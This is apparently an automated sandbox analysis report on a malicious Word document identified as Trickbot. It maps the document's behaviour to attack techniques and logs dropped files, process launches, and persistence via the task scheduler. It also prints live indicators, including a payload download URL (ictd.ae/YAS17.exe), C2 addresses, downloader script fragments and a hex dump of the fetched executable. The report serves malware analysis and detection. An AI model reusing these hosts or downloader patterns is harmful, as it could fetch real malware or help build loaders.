Loading ...

Play interactive tourEdit tour

Analysis Report 98.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:212960
Start date:04.03.2020
Start time:19:51:18
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:98.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.expl.evad.winDOC@13/14@2/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 76.1% (good quality ratio 73.8%)
  • Quality average: 85.9%
  • Quality standard deviation: 24.6%
HCA Information:
  • Successful, ratio: 89%
  • Number of executed functions: 72
  • Number of non-executed functions: 198
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe
  • Excluded IPs from analysis (whitelisted): 8.248.121.254, 8.241.78.126, 8.241.122.126, 67.26.137.254, 67.26.81.254
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Timeout during Intezer genetic analysis for unpackpe/5.2.ZXTRTU.exe.5a0000.1.unpack

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Trickbot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Scripting32Valid Accounts1Valid Accounts1Disabling Security Tools1Credential DumpingSystem Time Discovery1Remote File Copy12Data from Local SystemData Encrypted11Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaExecution through API22Scheduled Task1Access Token Manipulation11Scripting32Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution23Accessibility FeaturesProcess Injection111Obfuscated Files or Information11Input CaptureSecurity Software Discovery23Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface1System FirmwareScheduled Task1Masquerading1Credentials in FilesFile and Directory Discovery4Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line Interface3Shortcut ModificationFile System Permissions WeaknessValid Accounts1Account ManipulationSystem Information Discovery117Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkScheduled Task1Modify Existing ServiceNew ServiceVirtualization/Sandbox Evasion12Brute ForceVirtualization/Sandbox Evasion12Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskAccess Token Manipulation11Two-Factor Authentication InterceptionProcess Discovery3Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection111Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainRemote System Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsIndicator Removal from ToolsPrivate KeysSystem Network Configuration Discovery1Replication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeVirustotal: Detection: 13%Perma Link
Yara detected TrickbotShow sources
Source: Yara matchFile source: 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZXTRTU.exe PID: 2356, type: MEMORY
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B46B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_005B46B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A70F0 CryptBinaryToStringW,CryptBinaryToStringW,5_2_005A70F0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,5_2_005B0120
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AC9B0 CryptStringToBinaryW,CryptStringToBinaryW,5_2_005AC9B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,7_2_005F0120
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F46B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,7_2_005F46B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E70F0 CryptBinaryToStringW,CryptBinaryToStringW,7_2_005E70F0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005EC9B0 CryptStringToBinaryW,CryptStringToBinaryW,7_2_005EC9B0

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgIDJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgIDJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B09C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,5_2_005B09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A4060 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,5_2_005A4060
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A3230 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,5_2_005A3230
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E4060 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,7_2_005E4060
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F09C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,7_2_005F09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E3230 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,7_2_005E3230
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\DiskDrive\1\Volume\BackFiles\errorfix.batJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: ictd.ae
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49159 -> 198.15.119.71:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 198.72.111.141:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2022658 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 (WinHTTPRequest) 192.168.2.2:49158 -> 198.72.111.141:80
Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.2:49161 -> 181.129.104.139:449
Potential malicious VBS script found (has network functionality)Show sources
Source: C:\Windows\System32\cmd.exeDropped file: mySettings4.Write mySettings2.ResponseBody Jump to dropped file
Source: C:\Windows\System32\cmd.exeDropped file: mySettings4.SaveToFile concept Jump to dropped file
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.2:49161 -> 181.129.104.139:449
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Mar 2020 18:54:01 GMTServer: ApacheLast-Modified: Wed, 04 Mar 2020 18:35:09 GMTAccept-Ranges: bytesContent-Length: 294400Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f4 b5 21 8a b0 d4 4f d9 b0 d4 4f d9 b0 d4 4f d9 0d 9b d9 d9 b1 d4 4f d9 ae 86 da d9 b1 d4 4f d9 ae 86 cc d9 a4 d4 4f d9 ae 86 dc d9 b4 d4 4f d9 97 12 22 d9 b1 d4 4f d9 73 db 12 d9 b3 d4 4f d9 73 db 10 d9 b1 d4 4f d9 97 12 34 d9 be d4 4f d9 b0 d4 4e d9 38 d4 4f d9 ae 86 cb d9 bf d4 4f d9 ae 86 db d9 b1 d4 4f d9 b0 d4 d8 d9 b1 d4 4f d9 ae 86 de d9 b1 d4 4f d9 52 69 63 68 b0 d4 4f d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b4 07 37 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 78 00 00 00 04 04 00 00 00 00 00 15 4f 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 04 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 dc 00 00 00 00 e0 00 00 40 c5 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 97 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 14 c5 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 01 77 00 00 00 10 00 00 00 78 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cd 1f 00 00 00 90 00 00 00 20 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 05 00 00 00 b0 00 00 00 04 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 7d 16 00 00 00 c0 00 00 00 18 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 c5 03 00 00 e0 00 00 00 c6 03 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /YAS17.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ictd.ae
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknownTCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknownTCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknownTCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknownTCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknownTCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Source: unknownTCP traffic detected without corresponding DNS query: 181.129.104.139
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /YAS17.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ictd.ae
Found strings which match to known social media urlsShow sources
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: ictd.ae
Urls found in memory or binary dataShow sources
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.n
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ZXTRTU.exe, 00000007.00000002.1498540169.029D6000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ZXTRTU.exe, 00000007.00000002.1498540169.029D6000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabda
Source: cscript.exe, 00000003.00000002.1060687122.002D0000.00000004.00000020.sdmp, errorfix.bat.0.drString found in binary or memory: http://ictd.ae/YAS17.exe
Source: cscript.exe, 00000003.00000003.1060375579.002FC000.00000004.00000001.sdmp, cscript.exe, 00000003.00000002.1060706772.002FF000.00000004.00000001.sdmpString found in binary or memory: http://ictd.ae/YAS17.exe7
Source: cscript.exe, 00000003.00000002.1060559645.0013C000.00000004.00000010.sdmp, cscript.exe, 00000003.00000002.1061635667.024C0000.00000004.00000040.sdmpString found in binary or memory: http://ictd.ae/YAS17.exeC:
Source: cscript.exe, 00000003.00000003.1060375579.002FC000.00000004.00000001.sdmp, cscript.exe, 00000003.00000002.1060706772.002FF000.00000004.00000001.sdmpString found in binary or memory: http://ictd.ae/YAS17.exeN
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmpString found in binary or memory: http://wtfismyip.com/text
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
